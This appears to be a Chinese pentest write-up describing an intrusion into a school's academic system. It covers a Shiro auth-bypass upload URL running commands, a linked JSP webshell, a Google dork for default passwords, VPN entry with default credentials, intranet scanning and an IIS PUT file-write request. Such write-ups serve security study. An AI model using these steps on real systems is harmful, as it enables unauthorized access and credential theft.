文章来源粉丝投稿
前言:
本次测试是某教务系统审到后台的洞需要灰盒测试验证一下,故去打使用该系统的学校,目标还是拿到账号密码。
攻击路径如下:
某档案网站文件上传getshell→翻数据库得到工号+身份证→谷歌搜到多个系统使用手册→默认密码进入教务系统+vpn默认密码登录进内网→本机fscan扫内网b段+手测挖到sql注入。
具体问题如下:
一、某档案系统文件上传至命令执行bypass_waf(外网打点)
http://xxx.edu.cn:8080/
(shiro权限绕过,直接访问没有/;/会要登录 )访问。
http://xxx.edu.cn:8080/;/upload/Register/1_1628669142927.jsp?cmd=whoami
但很多敏感的命令都给waf拦截,我们目标是拿账号密码登教务系统,于是上大马不需要webshell管理工具连接,大马地址如下:
https://github.com/tennc/webshell/blob/9cbc8d5820cd3a83d50fb4ea6bf1c04fd38bd7be/www-7jyewu-cn/%E9%9D%9E%E5%B8%B8%E7%89%9B%E9%80%BC%E7%9A%84Jsp%E5%A4%A7%E9%A9%AC.jsp
账号密码到手,但拿这些账号密码去撞库不行,故用谷歌找该系统默认密码。
site:xxx.edu.cn 使用指南|工号|学号|系统|vpn|手册|默认密码
二、VPN进去打内网
iis-put-getshell
PUT /test.txt HTTP/1.1
Host: 202.xxx
Content-Length: 85
@{ var myMessage ="Hello World"; }
The value of myMessage is: @myMessage
http://202.xx/test.txt
本文始发于微信公众号(云剑侠心):某校渗透测试报告
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论